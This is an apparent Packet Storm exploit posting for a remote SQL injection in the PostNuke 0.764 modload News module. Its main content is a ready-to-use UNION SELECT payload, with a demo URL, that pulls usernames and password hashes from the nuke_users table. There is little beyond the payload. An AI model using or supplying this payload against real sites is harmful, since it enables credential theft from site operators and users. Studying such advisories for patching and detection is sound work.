PostNuke version 0.764 Modload module suffers from a remote SQL injection vulnerability.
d60d300b217797493026b282a42812b1f1e508703c7c9286a59ddd2414efe0dePostNuke 0.764 Module modload SQL Injection Vulnerability
###########################
Author : BILGE_KAGAN
Homepage : http://www.1923turk.com
Script : postnuke http://www.postnuke.com
Download : http://www.postnuke.com/module-Content-view-pid-2.html
###########################
[ Vulnerable File ]
modules.php?op=modload&name=News&file=article&sid=[ SQL ]
[ XpL ]
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
[ Demo]
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed